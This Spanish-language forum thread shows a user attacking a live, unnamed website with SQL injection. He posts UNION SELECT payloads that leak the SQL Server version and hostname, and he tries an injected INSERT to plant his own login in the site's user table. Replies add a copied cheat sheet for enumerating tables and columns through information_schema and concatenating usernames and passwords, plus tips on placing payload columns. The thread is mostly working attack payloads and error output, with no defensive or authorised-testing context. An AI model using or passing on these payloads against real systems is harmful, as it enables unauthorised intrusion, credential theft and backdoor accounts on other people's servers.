Hola que tal como va!! Encontre un pagina donde pude hacerles una inyecciones de SQL y me dio el nombre de la tabla mas Todas las culomnas.. les muestro algunas
dbo.tblUser.User_ID
dbo.tblUser.User_Code
dbo.tblUser.User_Password
dbo.tblUser.User_Permissions
dbo.tblUser.User_Number
dbo.tblUser.User_Firstname
dbo.tblUser.User_Surname
dbo.tblUser.User_TitleBefore
dbo.tblUser.User_TitleAfter
.
.Ahora cuando llego a tratar de sacarle la version por ejemplo con esto:
'union select @@version ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- Me tira este error...
CitarError: ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type nvarchar to bigint.
Cuando me tendrai q dar algo asi..
CitarError Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.2221.00 (Intel X86) Feb 9 2007 17:30:38 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1) ' to data type int.
Lo mismo pasa si pongo por ejemplo
'union select @@servername ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- No se a lo qiue se refiere con ese error...
Despues tambien como tengo las columnas intente agregar un registro con nombre de usuario y pass.. para loguearme puse
';INSERT INTO dbo.tblUser (User_Code, User_password) VALUES ('magnobalt', 'magno') --Y obtengo este error:
Citarerror: ERROR [23000] [Microsoft][ODBC SQL Server Driver][SQL Server]Violation of UNIQUE KEY constraint 'IX_tblUser'. Cannot insert duplicate key in object 'dbo.tblUser'. ERROR [01000] [Microsoft][ODBC SQL Server Driver][SQL Server]The statement has been terminated.
Entiendo Como si estoy queriendo ingresar un dato duplicado en la clave primaria... Pero Intente con numeros altos al lado de mi user y me sigue arrojando el mismo error...Pero creo q la columna user no creo q sea la clave primaria...alguna ayuda!!
Un abrazo
Si alguien me puede dar una mano!! Gracias
capas que eso te sirve
*************************************************************************
* Information Schema *
*************************************************************************
-1/**/union/**/select/**/0,1,2,3/*
*************************************************************************
* Nombre de las Tablas *
*************************************************************************
-1/**/union/**/select/**/0,1,table_name,3/**/from/**/information_schema.tab les/*
*************************************************************************
* Recorrer las Tablas *
*************************************************************************
-1/**/union/**/select/**/0,1,table_name,3/**/from/**/information_schema.tab les/**/limit/**/1,1/*
-1/**/union/**/select/**/0,1,table_name,3/**/from/**/information_schema.tab les/**/limit/**/2,1/*
-1/**/union/**/select/**/0,1,table_name,3/**/from/**/information_schema.tab les/**/limit/**/3,1/*
*************************************************************************
* Entrar en la Tabla *
*************************************************************************
-1/**/union/**/select/**/0,1,2,3/**/from/**/NOMBRE_DE_LA_TABLA
*************************************************************************
* Buscar Columnas en Una Tabla *
*************************************************************************
-1/**/union/**/select/**/0,1,column_name,3/**/from/**/information_schema.co lumns/**/where/*
*/table_schema='NOMBRE_DB_AQUI'/**/and/**/table_name='NOMBRE_TABLA_AQUI'
O
-1/**/union/**/select/**/0,1,column_name,3/**/from/**/information_schema.co lumns/*
*/where/**/table_name=char(97,100,109,105,110,105,115,116,114,97,116,105,11 8,111)/*
(N O M B R E D E L A T A B L A E N A S C I I)
*************************************************************************
* Recorrer Datos de la Columna *
*************************************************************************
-1/**/union/**/select/**/0,1,column_name,3/**/from/**/information_schema.co lumns/*
*/where/**/table_name=char(97,100,109,105,110,105,115,116,114,97,116,105,11 8,111)/**/limit/**/0,1/*
(N O M B R E D E L A T A B L A E N A S C I I)
*************************************************************************
* Concatenar *
*************************************************************************
-1/**/union/**/select/**/0,1,concat(NOMBRE_COLUMNA,0x3a,NOMBRE_COLUMNA,0x3a ,etc),3/**/from/**/NOMBRE_DE_LA_TABLA/*
Ejemplo:
-1/**/union/**/select/**/0,1,concat(username,0x3a,password,0x3a,email),3/ **/from/**/usuarios/*
**************************************************************************
* Funciones de Informaci?n *
**************************************************************************
* version() : version actual de mysql
* database() : nombre base de datos
* user() : conectado a la base de datos
* system_user()
* session_user()
* current_user()
* last_insert_id()
* connection_id()
**************************************************************************
* By boER! *
**************************************************************************
* Greets: Remote Execution *
**************************************************************************
Fuente Remoteexecution.org
saludos
'union select @@version ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
Citar
Error: ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type nvarchar to bigint.
prueba poniendo lo que quieres sacar en otras posiciones de la consulta
'union select 1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
'union select 1,1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
.....
......
Ahi esta una ya solocione en vez de colocarlo asi
'union select @@servername ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- Lo coloque asi
'union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, @@servername -- y me dio su hermosoo Error
CitarError: ERROR [22018] [Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'WSMSSQL02..................' to data type int.
Si alguien sabe A que se refiere con el error donde me dice que esta duplicando el dato en la clave primaria... coloco otra vez
Citarerror: ERROR [23000] [Microsoft][ODBC SQL Server Driver][SQL Server]Violation of UNIQUE KEY constraint 'IX_tblUser'. Cannot insert duplicate key in object 'dbo.tblUser'. ERROR [01000] [Microsoft][ODBC SQL Server Driver][SQL Server]The statement has been terminated.
Ahora vengo de la facu y sigo intentandoo..
Saludos
Grcias por la ayuda tambienn